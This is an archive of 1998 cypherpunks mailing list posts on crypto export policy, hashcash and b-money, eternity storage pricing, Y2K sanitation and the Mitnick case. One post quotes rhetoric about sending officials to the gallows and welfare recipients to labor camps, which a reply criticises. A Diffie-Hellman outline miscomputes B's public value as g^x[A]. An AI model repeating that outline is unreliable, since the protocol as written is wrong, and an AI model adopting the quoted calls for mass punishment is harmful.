From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Sun, 6 Dec 1998 19:51:06 +0800
To: cypherpunks@cyberpass.net
Subject: Vengeance Libertarianism
Message-ID: <3.0.3.32.19981205220239.006a17c8@209.204.247.83>
MIME-Version: 1.0
Content-Type: text/plain



Tim must be having a "bad hair" day. He actually mentioned sending people
to Labor Camps. That sounds so UN-Libertarian, I have to chuckle. I'm
chuckling because I wouldn't want to think you actually believe in this
very Hitleresque rant.

Or is some FED spoofing Tim and sending "threatening" material in his name?
In which case...lock and load, Tim. They're coming to get you!

APF

>and, have drifted into the camp I will dub "the vengeance
>libertarians." Summarized, roughly, as:
>
>"You've stolen my property, you've imprisoned my friends, you've passed
>laws making us all criminals, you've started wars to enrich your
>military-industrial complex friends, and you're corrupt bastards. You can
>forget about some kind of "libertarian amnesty." It's going to be payback
>time, with at least hundreds of thousands of statist judges, politicians,
>cops, soldiers, and other such persons going to the gallows. Payback time.
>Welfare recipients are going to have to pay back all that they have stolen,
>with compounded interest. Out of their pockets, or while in labor camps.
>Payback time."
>
>
>--Tim May
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas L. Peterson" <fnorky@chisp.net>
Date: Sun, 6 Dec 1998 06:21:19 +0800
To: "William H. Geiger III" <whgiii@openpgp.net>
Subject: Re: pgp disk
In-Reply-To: <199812051907.OAA001.57@whgiii>
Message-ID: <3669B5A0.9242EDF7@chisp.net>
MIME-Version: 1.0
Content-Type: text/plain



William H. Geiger III wrote:
> 
> In <Pine.LNX.4.02.9812051155290.30678-100000@khercs.chipware.net>, on
> 12/05/98
>    at 11:59 AM, Max Inux <maxinux@openpgp.net> said:
> 
> >>>Where is the source for pgpfone?
> 
> >Try pgpi.com, i believe if anyone has it they would.. maybe mit
> 
> AFAIK the source for PGPfone has never been released. I had wanted to do a
> port to the OS/2 platform but was never able to get the source code for
> it.
> 
> Nautilas has source available but I do not know what platforms it has been
> ported to.

Speak Freely can be found at these two sites:
http://www.fourmilab.ch/speakfree/unix/
http://www.fourmilab.ch/speakfree/windows/

It is free, has source code, and will work with pgp 2.6x.

-Doug
www.TheServerFarm.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Sun, 6 Dec 1998 11:28:56 +0800
To: cyphers <cypherpunks@cyberpass.net>
Subject: [Fwd: y2k/gary north delusions]
Message-ID: <366A01D6.28EF77EE@workmail.com>
MIME-Version: 1.0
Content-Type: text/plain

William J. Hartwell dropped this in my mailbox ...

To: Soren <sorens@workmail.com>
Subject: Re: y2k/gary north delusions
From: "William J.Hartwell" <billh@ibag.com>
Date: Sat, 05 Dec 1998 14:21:32 -0700
In-Reply-To: <366958DF.FBF816FC@workmail.com>
References: <199812050047.SAA19462@manifold.algebra.com><36694C23.B4CB9509@nyu.edu>

<toilet talk trimmed out>


>
>That's the fun part, figuring out how it could all be made to work.
>
>Unfortunately it's more likely that the sheeple will cry out for guvmint
>intervention to continue the flow of goodies, to which the western world
>has become addicted.
>
>IMHO, the military will be brought in to dig the latrines. Hoarders will
>be strung up for not redistributing their wealth in approved socialist
>style. Rewards will be posted for informing on a neighbor who is (may
>be) a hoarder (5% of the take?). 



Related to this... have you folks seen this thread going around some of the
y2k preparedness groups?

"..... its illegal to store more than 30 days of food ?....."


These folks are refering to some info on a web page related to executive
orders.

http://www.millennium-ark.net/News_Files/INFO_Files/EOs.html

This one I think needs some FUD busting...and no one does that better than
you guys!


--
					William J. Hartwell
					   (602)987-8436
					  Queencreek, Az.

billh@ibag.com			billh@interdem.com		billh@hartwell.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Sun, 6 Dec 1998 15:42:03 +0800
To: John Gilmore <gnu@toad.com>
Subject: Re: What was the quid pro quo for Wassenaar countries?
In-Reply-To: <199812050240.SAA24692@toad.com>
Message-ID: <366A2F3B.9A20B93A@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain



John Gilmore wrote:

> PS:  I particularly like Ambassador Aaron's characterization that
> this new development will help US industry, by censoring foreign crypto
> publishers in the same way the US government censors US publishers.
> A giant step forward for freedom and commerce everywhere, eh Mr. Aaron?
> What an incredibly talented liar, I mean diplomat, he is.

I agree.  This is something that I found particularly offensive.  "Really,
we're doing it for your own good!"  Feh.

--
What is appropriate for the master is not appropriate| Tom Weinstein
for the novice.  You must understand Tao before      | tomw@netscape.com
transcending structure.  -- The Tao of Programming   |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 6 Dec 1998 13:01:12 +0800
To: cypherpunks@cyberpass.net
Subject: Financial disclosure panic?
Message-ID: <v04020a07b28fb6556505@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Sender: kerry@phalse
MIME-Version: 1.0
Date:         Sat, 5 Dec 1998 21:16:35 -0500
Reply-To: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
Sender: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
From: Kerry Zero <kerry@2600.COM>
Subject:      Financial disclosure panic?
To: CYBERIA-L@LISTSERV.AOL.COM

I am the webmaster for kevinmitnick.com, the internet source of
information on the legal and media injustices that have been committed
against Kevin Mitnick (a computer hacker arrested in 1995 who has remained
in prison, pre-trial, with no chance at bail for nearly 4 years now,
despite the fact that the charges against him are relatively mild in
comparison to some other convicted hackers).

In a hearing Wednesday my name was brought up by the judge, Mariana
Pfaelzer, because she had received notification that I had requested her
financial disclosure reports, a request I had assumed logical, considering
the large number of companies that are claimed as victims in Mitnick's
case.  I have been doing a lot of research on the Mitnick case during the
past few months, and this was one part of that research, ordering what I
thought were publicly available records, and which I understood were not
meant for dissemination -- I never published them or disclosed them to the
public (above all, I would never have published this information on the
web, although that was not even the issue, as the judge had no idea who I
was, and she was not even aware on Wednesday that I am also Kevin's site
webmaster).  Apparently the judge was not at all happy simply that someone
on Mitnick's side of the fence had even researched this.  I suppose she'd
have been happier if it had been the prosecution, although obviously that
wouldn't have helped me find the facts I needed to know :)

I was told by different sources (present in the courtroom) that the judge
reacted as though infuriated at my request, and she put the government on
notice that "if anything happened" -- and left the sentence uncompleted.

Now I am left wondering what the potential legal ramifications of this
incident could possibly be.  I did nothing illegal, although in the
judge's eyes, apparently it was immoral or otherwise not right.  I can't
understand why -- my only guess is that she (Judge Pfaelzer) has so firmly
bought the belief that Kevin Mitnick is an extremely dangerous hacker
(though nothing he has done, and nothing in the charges, indicates this)
that she simply fears any actions those of us innocently researching his
case might take.

The information I requested, as I understood it, was private, and not for
publication, but it is openly available to the public by request; one does
not have to be a lawyer to request it. I am not a lawyer; far from it; and
I'm not a computer-cracker either -- I'm a female programmer in my 20s and
I write online course software for a university. This seemingly (to me)
bizarre incident has me blown away completely.

The financial disclosure information is not even detailed enough as to
allow one to estimate income or any other personal information about the
judge, and so I'm having trouble understanding what any possible misuses
of this information could be (and I don't really want to know, at this
point! :)  although obviously I never intended anything to come of the
information in any way, unless it was directly relevant to the case.  If
there had been a conflict of interest with Judge Pfalezer, it would be
very significant to Mitnick's case.  At any rate, I'm uncertain as to what
I should fear from the government -- if anything.  If one of the
corporations listed in the judge's statement happens to go bankrupt, will
I be investigated?  It seems ridiculous to me, but I have been warned that
I may be investigated, and the government prosecutor now has a copy of the
request I made, which apparently so infuriated the judge.

To me, it seems that this court may believe everyone involved in Mitnick's
"cause" is dangerous, although even Kevin himself has never been accused
of committing harm to a person or to a computer -- he is basically accused
of copying software.  There have, however, been several particularly
damaging false "facts" printed in the media about him, such as that he
stole credit card numbers and that he broke into NORAD as a teenager --
neither of which ever appeared in any charges against Kevin, and both were
proven to be untrue, but not before being printed on the front page of the
NY Times, unfortunately.

I suppose it's not my place to speculate, but I wonder how Kevin can
possibly get a fair case with this type of paranoia against him and his
supporters, if indeed it is paranoia... perhaps it is only my own
ignorance of the law, and this happens all the time.

I just wondered if any of you had any thoughts.  I've been following this
list for a while and have found it very educational.

thanks,
kerry@2600.com

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 6 Dec 1998 08:00:51 +0800
To: ryan@systemics.ai
Subject: Re: (eternity) eternity using politics rather than economics
In-Reply-To: <19981205164842.B25348@arianrhod.@>
Message-ID: <199812052327.XAA24671@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Ryan Lackey writes:
> When I was working on Eternity DDS stuff, I basically came to the same
> conclusion as Adam -- without anonymous bearer cash, you can't do
> a workable eternity implementation.

Well there is always hashcash (http://www.dcs.ex.ac.uk/~aba/hashcash/)
-- a highly distributed protocol, which should be easy to deploy, not
requiring central servers, and also (importantly) not requiring any
cooperation from banks or other parties.

One could use a simulated profit maximisation function based on
hashcash to allocate donated eternity space.

However, one suspects that due to the lack of convertibility, and
transferability of a unit of hashcash, people would start to use other
value metrics.  Perhaps political (servers cheating to help their pet
political cause, as there is no actual real profit motivation to
optimising for hashcash profit), or perhaps real cash leaking in, or
secondary market in hashcash.  The latter two would be a nice outcome
:-)

Perhaps this may be an application for Wei Dei's b-money protocol
(more on b-money in another post).

> It's an open question whether you could issue bearer cash backed in
> Eternity-units.  

Nice that.  Did you notice someone (I think on one of Bob Hettinga's
lists) proposing the sale of a percentage of internet bandwidth as a
net resource based unit.  As a proposed way to perhaps get around
hyper inflation, I think, though I am not sure entirely how this could
work either.

If I buy a particular unit of bandwidth I know it's value will fall
fast.  But the value of a _percentage_ of internet bandwidth will
increase.  However the people funding the bandwidth -- why would they
want to consider me a 0.001% stakeholder in their bandwidth?

One would need to buy shares in major bandwidth provision companies
like say cable & wireless.  Buy some shares in that to obtain a
percentage of the ownership of the percentage of total net bandwidth
that C&W owns?  Doesn't help.

Would a company selling bandwidth by the 1000th of a percentage of
global bandwidth profit from this?  It would have to use the money
raised by selling bandwidth percentage at todays prices to fund
increases in bandwidth in line with total bandwidth growth just to
fulfill it's obligations.  Add bearer share certificates for the
1000th percentage of global bandwidth and you have an appreciating
bearer asset based on net resources.  As long as such companies made
enough money to continue to exist.  Anyone have any plausible sounding
business plans for such an endeavour?

> That was my original plan, but it seems you would still want to have
> gold-units to trade for Eternity units.  The problems of
> guaranteeing quality of service in exchange for Eternity units are
> complicated but tractable, but having a separate scheme for auditing
> performance.

> Where I think "political" schemes would be particularly beneficial is 
> in sharing administrative control over a virtual corporation, etc.  

Political schemes such as those proposed by Markus are pretty nice for
collaborative filtering.  Just I would rather schemes be strongly
voluntary, and not have any negative effect on the purchasability of
eternity space by others.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 6 Dec 1998 08:48:42 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Wei Dei's "b-money" protocol
In-Reply-To: <199812051937.TAA12780@server.eternity.org>
Message-ID: <199812060008.AAA27126@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Some discussion of the properties of Wei's b-money protocol.

b-money seems to be book entry ecash system related to hashcash, where
the "book" is open, and distributed.  Anonymity is derived from the
fact that the participants can be pseudonymous.  hashcash would be a
candidate function for Wei's decentralised minting idea: to create
value you burn CPU time, just like with hashcash, but Wei's
distributed open book entry system allows you to psuedonymously
exchange value.

Problems are (1) inflation, (2) borrowing resources, (3) linkability
of transactions, (4) b-money has a big bulk discount, (5) getting
money in and (6) out, (7) resource waste.

(1) Inflation -- the cost of hardware to compute a given collision
falls in line with Moores law.  Perhaps one could get around this by
defining a b-money unit to require more computational effort over
time.  Say define 1 b-money unit to be the computational effort of 1
months compute on the most efficient hardware that can be bought for
$1000 at current prices and state of hardware.

(2) Borrowing resources -- a student with access to a campus full of
workstations can obtain quite a bit of free CPU time.

(3) Linkability -- although the participants are anonymous, their
transactions are linkable and so participants are pseudonymous in
b-money (linkable anonymity being pseudonymity).  This is inherent
because of the need to broadcast transactions to ensure the open book
entry is updated.

(4) You can get money in -- by buying hardware -- but it will cost
different people different amounts.  If I am using an existing general
purpose workstation my units will cost more than if I buy custom
hardware.  Not so bad a problem, just view this as an economy of
scale, or a bulk discount.

(5) Getting money in by buying hardware works, but people don't want
the inconvenience of buying custom hardware, they would rather just
buy b-money for force-monopoly backed money (national currencies).  If
we setup a mint which made it it's business to buy up-to-date custom
hardware it would be difficult to buy b-money anonymously because the
pseudonym would reveal his identity by the use of traceable payment
systems (credit card, cheque, wire transfer, etc).

(6) Getting money out is difficult also.  The pseudonymous b-money
user would find it difficult to obtain force-monopoly money without
revealing his identity.

(7) If such a system took off there seems to be an overhead equivalent
to the value of b-money in circulation which over time has essentially
been burnt off in disipated heat, and useless hardware.  But probably
the cost is still much lower than the enormous costs involved in
maintaining a force monopoly to enforce traceable transactions.


Some thoughts on ways to improve on some of these areas:

To improve the problems of pseudonym identity leakage in (5) (paying
for b-money) perhaps we could formulate a blinded cost function rather
than my suggestion of hashcash.  In this way one could easily purchase
hashcash.  One approach to achieving this would be to have an ordinary
ecash mint using chaumian blinding but somehow be able to audit that
the mint is producing hashcash tokens to match each ecash withdrawl.
Then we would have an blind ecash mint backed in hashcash.  The
purchasing pseudonym unblinds the token and broadcasts it.  Servers
check that it has not been seen before, and increase the pseudonym's
balance by it's value.

Periodically the hashcash mint has to publish it's hashcash to prove
that it is not cheating.

It may be that you could find a blind cost function which achieves
both blinding and some cost function at the same time, to skip the
stage of the mint publishing associated hashcash.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 6 Dec 1998 08:45:31 +0800
To: ravage@EINSTEIN.ssz.com
Subject: Re: (eternity) cost metrics
In-Reply-To: <199812052047.OAA31186@einstein.ssz.com>
Message-ID: <199812060026.AAA28211@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate writes:
> Adam Back <aba@dcs.ex.ac.uk> wrote:
> > I think a better deciding factor of which files remain and which don't
> > is hard, anonymous ecash.  [...]
> 
> There is some window for abuse in this method. It allows a well endowed
> entity to bias the information available. 

The alternatives, such as say one vote per person have problems too.
Perhaps one person cares greatly about the issue and spends the one
vote posting pro-X information (for some issue X), and the other
person hardly cares at all, but has some slight bias against issue X
so spends one vote posting anti-X information.  Now we have ignored
this difference in scale.

Cash allows you to measure the scale.

Perhaps an in-between voting metric might be percentage of individuals
wealth.  But then this also is unfair because a pennyless dole sponger
could dump 50% of his wealth on an issue on a whim, and the person who
has mega bucks may have worked hard to have the money to help
disseminate information about some issue Y he believes passionately
in.

So straight cash seems I think to be a good metric.

Note also my earlier comment that I view an important eternity
objective to be preventing negative votes on data availability.  You
can only disseminate more, say contradictory, information not remove
information.  You can attempt to disseminate more copies (make
available with higher redundancy, and fund faster download) perhaps,
but this does not drown out the other information.

Filtering and rating services should ensure that just because there
are a lot of copies of naff software my mega-corp M out there, it
won't in anyway reduce your access to quality open source software,
nor slow you down in finding it neatly cataloged by use by your
quality open source software rating service.

If you worry that mega-corp M will buy all available space at a
premium, there is an easy solution: if mega-corporation M decides to
flood eternity space with their inferior software, one can combat them
by getting into the eternity servers business, taking their money and
using the profits to disseminate quality open source software, or
simply to profit from their gullibility.

> There is also the question of data degredation, in the sense of
> worth, over time versus the archival/historical worth of the
> data.

As long as people are interested to keep the data around in low
priority low access speed storage they will pay for this to happen.

If they don't care -- well they don't care.  People who do care can
fund it, and evangelize to others on the merits of doing this.  No one
has any special right to force others to pay for keeping junk around
for the sheer historical sake of completeness of it.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 6 Dec 1998 08:11:43 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: the shit hitting the fan (fwd)
Message-ID: <199812052347.AAA20373@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>It's during times like these that you learn more about your fellow
>c'punks than you need to ...

You're correct. I had no clue that the Cypherpunks were such a shitty group. 

>On Fri, 4 Dec 1998, Jim Choate wrote:
>
>> Forwarded message:
>>
>> > Date: Sat, 5 Dec 1998 06:00:13 +0100
>> > From: Anonymous <nobody@replay.com>
>> > Subject: the shit hitting the fan
>>
>> > LA has 1e7 people who shit about a kilo per day.  Compute the volume of that
>> > after a week.
>>
>> It's not the raw volume that's critical but rather the percentage of the
>> average personal space per inhabitant versus how much to store a weeks
>> worth. For the average person storing a weeks worth of solid waste in a
>> platic bag with bleach, lye, or similar material is reasonable.
>>
>> I've gone on long duration camping trips of about a weeks length and the
>> storing and portage costs are not excessive (having a boat or horse helps
>> move it around).

FlushMonger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 6 Dec 1998 17:42:14 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: (eternity) democracy is a bad idea on the net too! (fwd)
In-Reply-To: <199812052047.OAA31186@einstein.ssz.com>
Message-ID: <3.0.5.32.19981206010738.0098bc90@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:47 PM 12/5/98 -0600, Jim Choate wrote, not in this order:
> Two major negatives to a free-market approach that are never discussed.

>There is also the question of data degredation, in the sense of worth, 
>over time versus the archival/historical worth of the data.

Huh?  We talk about this all the time.  How much does data storage cost,
and how long is the information useful to readers and writers,
and how do these change over time?   Those are some of the main factors
that drive the potential pricing structures -- if you get them
wrong you either bleed money (so nobody wants to offer the service)
or overcharge (so almost nobody wants to buy it), but if you get
them right you might Make Big Bucks, if you're good and there's
really a market for this sort of thing.

>There is some window for abuse in this method.
>It allows a well endowed entity to bias the information available. 

Not in any way that matters, and this _is_ a critical free-market point.
Yes, rich folks can pay for eternity services that carry all the
information they care about, just as they can pay for web pages they want,
because they've got money to burn and can overpay for it,
while you politically correct poorer folks can pay for the information
you want, but only if it's economically viable, just as with the web.
Get used to it.  Information storage isn't an economic good like land,
where they ain't making any more of that stuff, so if rich people
can outbid you for the fixed supply you lose - it's a good that
increases in supply as money gets thrown at people who generate it,
and having rich people making the cover traffic grow is a Good Thing.
	(In reality, of course, the early market will be biased toward 
	porn, warez, and pirated music, just like the rest of the net :-)

As has been discussed on this list before, there are two main
components to the cost - the cost of storage and the cost of retrieval.
Storage keeps getting radically cheaper and larger every year, and
you could provide storage forever for about twice the cost of one year's 
storage, assuming minimal inflation and continual technology improvement.

On the other hand, the cost of retrieval depends on how often the
document is accessed, as well as for how long - you could probably provide
a fixed N accesses per year forever for a low fixed price,
because bandwidth will keep getting cheaper,
but to accommodate any volume of retrievals, you need to charge
per access, either as digicash or perhaps substitutes such as banner ads
if they bring in enough revenue (Geocities apparently thinks they do.)





				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@nyu.edu>
Date: Sun, 6 Dec 1998 13:35:17 +0800
To: cypherpunks@cyberpass.net
Subject: Re: y2k/gary north delusions
In-Reply-To: <199812050047.SAA19462@manifold.algebra.com>
Message-ID: <366A2313.DF9FA151@nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Soren wrote:
> 
> Michal Hohensee wrote:
> >
> >
> > Latrines aren't sufficient to the task.  In a city like NYC, latrines
> > might solve the problem for perhaps a week (assuming that we tear up all
> > the roads and sidewalks --something which we cannot do in time, even if
> > we wanted to), but then they'll be full, and there won't be any more
> > places the latrines can be rotated to.
> 
> One obvious advantage to living in the penthouse of a highrise.  Of
> course, the elevators may not be working. The elevator shaft may make an
> effective latrine though.

A temporary solution, at best.  You still have to go down to the ground
to shop, go to work, etc.  Besides, even if you don't get infected
directly from the offal on the ground, you can still be infected by
other people.  

> Current waste disposal conventions such as sewers and trash removal
> don't actually magically make this stuff disappear.  In NYC it all ends
> up in the Atlantic latrine, where it gets picked up by the gulf stream
> and ends up being deposited on Florida beaches after a long sea journey.
> There are so many plastic bags bearing logos in the sargasso sea, it
> looks like it has been sold off to corporate interests for advertizing
> purposes.

Yah, but they are pretty good at siphoning the stuff out of the city,
where people live, which is the point.  *Where* it's siphoned to may not
be the most intelligent place, but as long as it's not next to us, we
don't get sick and die nearly as often.  I'm not saying that existing
sewer systems are perfect, but they *are* keeping us alive. 

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@nyu.edu>
Date: Sun, 6 Dec 1998 13:51:38 +0800
To: cypherpunks@cyberpass.net
Subject: Re: y2k/gary north delusions
In-Reply-To: <199812051640.KAA04447@manifold.algebra.com>
Message-ID: <366A2610.7F850BA3@nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Igor Chudov @ home wrote:
> 
> Michael Hohensee wrote:
> > Latrines aren't sufficient to the task.  In a city like NYC, latrines
> > might solve the problem for perhaps a week (assuming that we tear up all
> > the roads and sidewalks --something which we cannot do in time, even if
> > we wanted to), but then they'll be full, and there won't be any more
> > places the latrines can be rotated to.
> 
> Why, shit is actually pretty compact. usually with latrines, the liquid
> filtrates out, and the compressed shit does not take too much space.
> 
> If you dig a deep enough hole (2-3 yards) it should last for a long,
> long time. I estimate that a human being produces about 1/2 to 1lb
> of hard waste per day, some are more full of it, some less. Let's settle
> on one lb per day.
> 
> Let's see, a hole that is 5 yards wide, 3 yards deep, and, say, 2 yards
> wide, is about 30 cubic yards. It could take about 40 tons of hard
> compressed waste, that is, 80 thousand man-days of shitting can be
> compressed in it.
> 
> You definitely need some heavy machinery to dig this kind of hole
> (and then you have to build smoe kind of frame over it to prevent people
> from falling into it if it collapses), but it is not hard and can even
> be done in a catastrophic scenario.
> 
> That's a lot!!! Let's see,a high rise building with 50 floors and 10
> apartments in each floor, that's about 1200 people. The latrine would
> last them what, about sixty days! And then they can dig another one.

This assumes that we can compress it this much, which assumes that we
have sufficient machinery.  It further assumes that we will be able to
ignore the "wet" component of human waste.  You can't just pour it down
the drains.

Next, we should realize that these latrines are themselves not going to
be particularly sanitary, and it would be most unwise to use them for
any extended period of time.  Hell, even *with* flush toilets, I've seen
people squatting down in subway stations to take a leak not more than 5
feet from the restroom.

Further, we should realize that for the above reason, people are not
going to be particularly motivated to use these latrines.  After all,
nobody wants to hold it for a long time while they wait in line to take
a leak, just for the privilege of relieving themselves in disease
central.  You're going to see shit in the street in any case.

Finally, even if we dig these holes, (and they're *going* to be bigger
than what you describe, as they must contain liquid, as well as solid
waste), we're going to end up messing up the roads something fierce. 
Big cities *need* roads to transport life-critical items.  If we dig
them up, we're in even worse trouble.

> > Then we're back to doing it in the open.  Less concentrated cities might
> > last a while longer, but not much longer.  There's no getting around it,
> > we *need* working sewer systems to have modern cities.  Otherwise, the
> > cities die.
> 
> Not in the short run. They could survive for a while.
> 
>         - Igor.

In the *very* short run.  Like, say, a few weeks.  That is if the food
doesn't stop coming in first --then things finish up a bit sooner.

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@nyu.edu>
Date: Sun, 6 Dec 1998 13:49:34 +0800
To: cypherpunks@cyberpass.net
Subject: Re: y2k/gary north delusions
In-Reply-To: <199812051511.KAA001.50@whgiii>
Message-ID: <366A26C2.30D6892E@nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



William H. Geiger III wrote:
> 
> In <36694C23.B4CB9509@nyu.edu>, on 12/05/98
>    at 10:07 AM, Michael Hohensee <mah248@nyu.edu> said:
> 
> >Then we're back to doing it in the open.  Less concentrated cities might
> >last a while longer, but not much longer.  There's no getting around it,
> >we *need* working sewer systems to have modern cities.  Otherwise, the
> >cities die.
> 
> And you say this as if it is a bad thing.
> 

Well it is, sorta.  I've got the misfortune to live in NYC, as do many
many many other people.  People who (like me) aren't particularly
interested in dying of disease and/or starvation.  If the "shit hits the
fan", we're in for a serious mess, in any event. :/

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 6 Dec 1998 11:03:46 +0800
To: ichudov@Algebra.COM
Subject: ...
Message-ID: <199812060228.DAA03195@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> My friend needs a website with explanations of PK cryptography
> and related interesting protocols. I have Schneier's book but she
> lives far from me and the book is too long for her to read.
> 
> Any suggestions for something on the Web?

This does not fully explain the protocols, but an explanation of RSA is
available at John Young's Cryptome.

http://jya.com/whprsa.htm

Download it, though, because it was one of the files relating to Bill Payne
which will most likely be deleted when he gets his own web page up as promised.

Diffie-Hellman and NSA's Key Exchange Algorithm need no URLs --

Diffie-Hellman was designed by Whitfield Diffie and Martin Hellman, and its
publication sparked public-key cryptography (and received a standing ovation
when presented).

The Key Exchange Algorithm (KEA) is an NSA "type II" algorithm used in the
Defense Messaging System. It was kept classified until recently. Schneier
mentions in his CRYPTO-GRAM newsletter that problems with making
tamper-resistant hardware carrying the algorithm may have led to its release.

The devices are named A and B. Brackets represent a value's "owner."

Diffie-Hellman:

Both: Retrieve public values g and p.
   A: Chooses a random secret value x[A].
      Calculates X[A]=g^x[A] mod p.
      Sends X[A] to B.
   B: Chooses a random secret value x[B].
      Calculates X[B]=g^x[A] mod p.
      Sends X[B] to A.
   A: Raises value received from B to the x[A] power and uses this to calculate
      the key.
   B: Raises value received from A to the x[B] power and uses this to calculate
      the key.

KEA:

(this is a modified version of an old post to Cypherpunks)

Constants:
p: 1024-bit prime modulus
q: 160-bit prime divisor of p-1
g: 1024-bit base

Secret user-dependent values:
x: 160-bit random key
r: 160-bit random key

Public user-dependent values:
Y: g^x mod p
R: g^r mod p

z(x, y) represents KEA threshing.

1  A->B: Y[a]
2  B->A: Y[b]
3  A->B: R[a]
4  B->A: R[b]
5  A   : (Y[b])^q mod p = 1? If not, stop; (R[b])^q mod p = 1? If not, stop;
         Are Y[b] and R[b] between 1 and p? If not, stop.
6  B   : (Y[a])^q mod p = 1? If not, stop; (R[a])^q mod p = 1? If not, stop;
         Are Y[a] and R[a] between 1 and p? If not, stop.
7  A   : t[ab]=(Y[b])^r[a] mod p; u[ab]=(R[b])^x[a] mod p
8  B   : t[ab]=(R[a])^x[b] mod p; u[ab]=(Y[a])^r[b] mod p
9  A   : (t[ab]+u[ab]) mod p = 0? If so, stop; if not, Key=z(t[ab],u[ab])
10 B   : (t[ab]+u[ab]) mod p = 0? If so, stop; if not, Key=z(t[ab],u[ab])

Zero-Knowledge Protocols:
http://www.tcm.hut.fi/Opinnot/Tik-110.501/1995/zeroknowledge.html

RSA Data Security's RSA Labs on protocols:
http://www.rsa.com/rsalabs/faq/html/7.html

> 
> thanks
> 
> igor




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 6 Dec 1998 20:28:35 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Commerce Hacked?
Message-ID: <199812061208.HAA29686@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Since some time after the Department of Commerce issued the 
recent press release on Wassenaar the site (www.doc.gov) has not 
been accessible, at least not from here.

The press release section of the International Trade
Administration (www.ita.doc.gov), David Aaron's org, for a while 
had a notice that updating was being done and the site would 
be fixed shortly. Then the ITA site  disappeared, along with the 
main DoC site.

We spoke with a public affairs rep at DoC before this happened
and to inquire when the department would issue detailed information
to flesh out the press release. I said there was a furor over Aaron's 
spin, and much skepticism of its validity. She said she would check 
and call back but hasn't.

Wonder if the site was hacked, from the outside or inside.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 6 Dec 1998 16:21:34 +0800
To: cypherpunks@cyberpass.net
Subject: Re: PGP Disk
Message-ID: <199812060804.JAA30605@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> Has anyone had the chance to try out the new McAfee PGP disk?
> It seems pretty straightforward, allowing for the creation of 
> encrypted "drives" using the CAST algorithm.  Is anyone aware of 
> any security flaws with it?

Make sure you get the latest version.  The version released in May or
June had a bug in it (bug was only in the Windows version, the Mac is OK).
The new version re-encrypts old PGP disks to fix the problem.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 6 Dec 1998 23:17:31 +0800
To: e$@vmeng.com, dbs@philodox.com>
Subject: e$: Cryptography -- The Steel Rails of Digital Commerce
Message-ID: <v04020a0bb2902d320184@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


Lots of sensible people on cypherpunks have made an excellent point before,
but Nelson Minar has said it quite succinctly in the message below, with an
outstanding example from Sun, in the post that I'm including here from Perry
Metzger's cryptography list.

The point it this: There is only one, and completely acceptable, solution to
this whole crypto-exportabilty mess: don't export anything. That is, make
*only* strong crypto, make it inside your country, and let crypto folks in
other countries take care of themselves. The permiability of national borders
to the internet will get your actual cryptography overseas if it's novel
and useful, and, if you use crypto plugged into your software, like Sun
does with Java, then you'll sell more of that software because it
*requires* strong cryptography, other people's or not.

